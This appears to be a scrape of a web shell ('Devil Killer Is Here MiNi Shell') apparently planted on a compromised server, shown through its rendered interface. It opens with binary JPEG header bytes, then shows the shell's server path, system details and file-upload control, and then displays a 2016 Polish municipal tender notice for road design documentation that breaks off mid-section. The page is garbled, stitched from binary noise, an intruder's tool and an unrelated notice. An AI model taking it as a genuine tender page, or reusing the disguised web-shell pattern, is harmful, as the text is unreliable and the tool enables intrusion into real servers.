JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161123/350041-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.um.wysmaz.wrotapodlasia.pl/zamowieniap/' target='_blank'>http://bip.um.wysmaz.wrotapodlasia.pl/zamowieniap/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 350041 - 2016
              z dnia 2016-11-23 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wysokie Mazowieckie: Wykonanie dokumentacji technicznej na budowę obwodnic od strony południowej miasta Wysokie Mazowieckie<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              nieobowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Miejska Wysokie Mazowiecki, krajowy numer identyfikacyjny
              45001067100000, ul.
              ul. Ludowa 
              15,
              18200  
              Wysokie Mazowieckie, woj.
              podlaskie, państwo
              Polska, tel.
              862 752 592, e-mail
              , faks
              862 752 593.
              <br />
              Adres strony internetowej (URL): wwwysokiemazowieckie.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.um.wysmaz.wrotapodlasia.pl/zamowieniap/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.um.wysmaz.wrotapodlasia.pl/zamowieniap/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />operator pocztwy, kurier, doręczenie osobiste<br />
                Adres:
                <br />Urząd Miasta Wysokie Mazowieckie, ul. Ludowa 15, 18-200 Wysokie Mazowieckie</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie dokumentacji technicznej na budowę obwodnic od strony południowej miasta Wysokie Mazowieckie<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Część I zamówienia. Droga zbiorcza oznaczona w miejscowym planie zagospodarowania przestrzennego 06 KZ łącząca ul. Ludową z ul. 1 Maja wraz z infrastrukturą towarzyszącą: ciągi piesze, ścieżki rowerowe, oświetlenie uliczne, kanalizacja sanitarna, deszczowa i wodociąg. Projekt ma również obejmować włączenie w ul. Ludową i 1 Maja. 
Część II zamówienia . Droga zbiorcza oznaczona w miejscowym planie zagospodarowania przestrzennego 010 KZ łącząca ul. Szpitalną z ul. 1 Maja wraz z infrastrukturą towarzyszącą: ciągi piesze, oświetlenie uliczne, kanalizacja sanitarna, deszczowa i wodociąg. Projekt ma również obejmować włączenie w ul. Szpitalna i 1 Maja. 
Do obowiązków wykonawcy  należą wszelkie prace przygotowawcze i pomocnicze związane z prawidłowym opracowaniem projektu, w tym:
1.	Uzgodnienie z zamawiającym proponowanych rozwiązań funkcjonalnych 
i użytkowych oraz głównych rozwiązań materiałowych (z uwzględnieniem optymalizacji rozwiązań projektowych)  na etapie koncepcji projektu.
2.	Uzyskanie w niezbędnym zakresie wszelkich wymaganych uzgodnień branżowych wraz z naradą koordynacyjną  jeśli będzie to wymagana przepisami prawa
3.	Mapy do celów projektowych zapewnia wykonawca dokumentacji, podziały gruntów.  
4.	Przygotowanie karty informacyjnej przedsięwzięcia niezbędnej do uzyskania decyzji 
o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia. 
5.	Sporządzenie operatu wodnoprawnego i uzyskanie pozwolenia wodnoprawnego na odprowadzenie wód opadowych  jeśli będzie to wymagane przepisami prawa.
6.	Usunięcie kolizji z istniejącymi sieciami.
7.	Zapewnić miejsce dla sieci gazowej i elektroenergetycznej, które wykonywane będą przez gestorów sieci poza niniejszym opracowaniem.
8.	Uzgodnienia i opinie wymagane przepisami ustawy Prawo Budowlane oraz ustawy z dnia 10 kwietnia 2003r. art. 11b oraz art. 11d o szczególnych zasadach przygotowywania i realizacji inwestycji w zakresie dróg publicznych oraz wszelkie inne uzgodnienia niezbędne do prawidłowego wykonania przedmiotu zamówienia.  
9.	Inne czynności jakie wynikły w trakcie projektowania niezbędne do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID).
Zakres rzeczowy obejmuje co najmniej:
1.	Inwentaryzacja terenu
2.	Projekt budowlany i wykonawczy  6 egz. + wersja elektroniczna - 1 egz. 
3.	Przedmiar robót  2 egz. + wersja elektroniczna - 1 egz. (oddzielnie na poszczególne elementy)
4.	Kosztorys inwestorski  2 egz. + wersja elektroniczna - 1 egz. (oddzielnie na poszczególne elementy)
5.	Specyfikacje techniczne wykonania i odbioru robót  1 egz. + wersja elektroniczna - 
1 egz. (oddzielnie na poszczególne elementy) oraz plan BIOZ.
6.	Projekt organizacji ruchu.
Dokumentacja projektowa winna być wykonana zgodnie z wymogami art. 29 i art. 30 prawa zamówień publicznych  wykonawca winien opisać przedmiot zamówienia i jego cechy w sposób jednoznaczny i wyczerpujący, za pomocą dostatecznie dokładnych i zrozumiałych określeń, uwzględniając wszystkie wymagania i okoliczności mogące mieć wpływ na proces sporządzania oferty, a więc taki, który zapewnia, że wykonawcy będą w stanie zidentyfikować, co jest przedmiotem zamówienia w sposób, który nie utrudni uczciwej konkurencji (zakazuje się dokonywania opisu przedmiotu zamówienia poprzez wskazanie znaków towarowych, patentów lub pochodzenia).
Wykonawca zobowiązany będzie do bezpłatnej aktualizacji kosztorysu inwestorskiego w terminie 3 lat licząc od daty wykonania i odbioru zamówienia oraz zapewnienia nadzoru autorskiego (bez dodatkowego wynagrodzenia) podczas realizacji robót na podstawie opracowanej dokumentacji.
Rozliczenie za przedmiot umowy odbywać się będzie na podstawie faktury wystawionej po dostarczeniu kompletnej, poprawnej dokumentacji i podpisaniu protokołu jej odbioru.
Faktura będzie płatna w terminie 30 dni od daty dostarczenia jej przez wykonawcę do siedziby zamawiającego. Dopuszcza się faktury przejściowe w wysokości do 30% wartości zamówienia nie wcześniej niż po zaakceptowaniu koncepcji przez zamawiającego.
Wykonawca ponosi pełną odpowiedzialność za skutki wynikające z nieterminowego i nienależytego wykonania zadania.
Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę do jednej lub dwóch części zamówienia. <br /><br /><b>II.5) Główny kod CPV: </b>71300000-1<br /><b> Dodatkowe kody CPV:</b>71320000-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 14/07/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie wymaga spełnienia warunku w sposób szczególny <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie wymaga spełnienia warunku w sposób szczególny <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający szczegółowe warunki udziału w postępowaniu, tj.:
	wykonawca ubiegający się o udzielenie zamówienia musi wykazać, że wykonał w okresie ostatnich 3 lat przed upływam terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym czasie, wykonał co najmniej:
w odniesieniu do Części 1. (06KZ):

- co najmniej 2 zadań polegających na wykonaniu dokumentacji projektowej (niezbędnej do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej) na budowę, rozbudowę  lub przebudowę drogi w tym jedna co najmniej o wartości 70 000 zł brutto. 

w odniesieniu do Części 2. (010KZ):

- co najmniej 2 zadań polegających na wykonaniu dokumentacji projektowej (niezbędnej do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej) na budowę, rozbudowę  lub przebudowę drogi w tym jedna co najmniej o wartości 70 000 zł brutto. 

	wykonawca ubiegający się o zamówienie musi wskazać do [wykonania / uczestniczenia w wykonaniu] niniejszego zamówienia następujące [osoby/podmioty], właściwe do realizacji określonych czynności, które posiadają określone kwalifikacje, niezbędne do wykonania zamówienia tj. musi dysponować w trakcie realizacji zamówienia: 
w odniesieniu do Części 1. (06KZ):
- 1 osobą - projektantem z nie mniej niż 3 letnim doświadczeniem przy sporządzaniu projektów na budowę, rozbudowę lub przebudowę dróg, posiadającym uprawnienia budowlane do projektowania w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, niezbędne do wykonywania przedmiotu zamówienia  wymagane przepisami prawa oraz należącym do właściwej Okręgowej Izby Inżynierów Budownictwa jeżeli wymagają tego przepisy prawa.
- 1 osobą - projektantem z nie mniej niż 3 letnim doświadczeniem przy sporządzaniu projektów branży sanitarnej, posiadającym uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, niezbędne do wykonywania przedmiotu zamówienia  wymagane przepisami prawa oraz należącym do właściwej Okręgowej Izby Inżynierów Budownictwa jeżeli wymagają tego przepisy prawa.
- 1 osobą - projektantem z nie mniej niż 3 letnim doświadczeniem przy sporządzaniu projektów branży elektrycznej, posiadającym uprawnienia budowlane do projektowania w specjalności instalacyjnej elektrycznej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, niezbędne do wykonywania przedmiotu zamówienia  wymagane przepisami prawa oraz należącym do właściwej Okręgowej Izby Inżynierów Budownictwa jeżeli wymagają tego przepisy prawa.


w odniesieniu do Części 2. (010KZ):

- 1 osobą - projektantem z nie mniej niż 3 letnim doświadczeniem przy sporządzaniu projektów na budowę lub przebudowę drogi, posiadającym uprawnienia budowlane do projektowania w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, niezbędne do wykonywania przedmiotu zamówienia  wymagane przepisami prawa oraz należącym do właściwej Okręgowej Izby Inżynierów Budownictwa jeżeli wymagają tego przepisy prawa.
- 1 osobą - projektantem z nie mniej niż 3 letnim doświadczeniem przy sporządzaniu projektów branży sanitarnej, posiadającym uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych  lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, niezbędne do wykonywania przedmiotu zamówienia  wymagane przepisami prawa oraz należącym do właściwej Okręgowej Izby Inżynierów Budownictwa jeżeli wymagają tego przepisy prawa.
- 1 osobą - projektantem z nie mniej niż 3 letnim doświadczeniem przy sporządzaniu projektów branży elektrycznej, posiadającym uprawnienia budowlane do projektowania w specjalności sieci, instalacji i urządzeń elektrycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, niezbędne do wykonywania przedmiotu zamówienia  wymagane przepisami prawa oraz należącym do właściwej Okręgowej Izby Inżynierów Budownictwa jeżeli wymagają tego przepisy prawa.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Opis sposobu dokonywania oceny spełnienia tego warunku
Ocena spełnienia tych warunków zostanie przeprowadzona w formule spełnia/nie spełnia w oparciu o informacje zawarte w oświadczeniu o spełnieniu warunków udziału w postępowaniu i w wykazie usług wykonanych, nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz dowody określające czy te usługi zostały wykonane należycie zwłaszcza zgodnie z przepisami prawa budowalnego i prawidłowo ukończone, przy czym dowodami o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy oraz na podstawie wykazu osób skierowanych przez wykonawcę do realizacji zamówienia.  </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">nie wymagane podatkowe dokumenty poz oświadczeniem o braku podstaw do wykluczenia</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />- wykaz usług wykonanych, nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz dowody określające czy te usługi zostały wykonane należycie zwłaszcza zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy, 
- wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także z zakresu wykonywanych przez nie czynności oraz informacją  o podstawie dysponowania tymi osobami.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)formularz ofertowy  zał. Nr 1a i 1b  do SIWZ,
2)wykaz części zamówienia, których wykonanie Wykonawca chce powierzyć podwykonawcom.
3)pełnomocnictwo - w przypadku, gdy oferta została podpisana przez  pełnomocnika  lub   gdy oferta została złożona przez wykonawców wspólnie ubiegających się o udzielenie zamówienia  zgodnie z art. 23  ustawy.
4)dowód wniesienia wadium
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Oferta musi być zabezpieczona wadium o wartości:
Zamawiający ustala wadium  w wysokości 4 000 zł za jedną część.
Wadium należy złożyć oddzielnie dla każdej części zamówienia. 
2.Wadium może być wniesione w jednej lub kilku następujących formach:  
a)pieniądzu,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenia kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2014r. poz. 1804 oraz z 2015r. poz. 978 i 1240).
Wadium wnoszone w formie pieniężnej należy wpłacić przelewem (tj. w formie bezgotówkowej) na rachunek bankowy w PKO BP SA O/WYSOKIE MAZOWIECKIE  Nr rachunku 81 1020 1332 0000 1402 0941 7629 dowód wpłaty wadium należy dołączyć do oferty. W tytule wpłaty należy wpisać: Wadium  wykonanie dokumentacji technicznej na budowę obwodnic od strony południowej miasta Wysokie Mazowieckie wraz z określeniem części zamówienia na którą składane jest wadium. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym zamawiającego przed upływem terminu składania ofert tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).
3.Zamawiający zaleca aby w przypadku wniesienia wadium w formie:
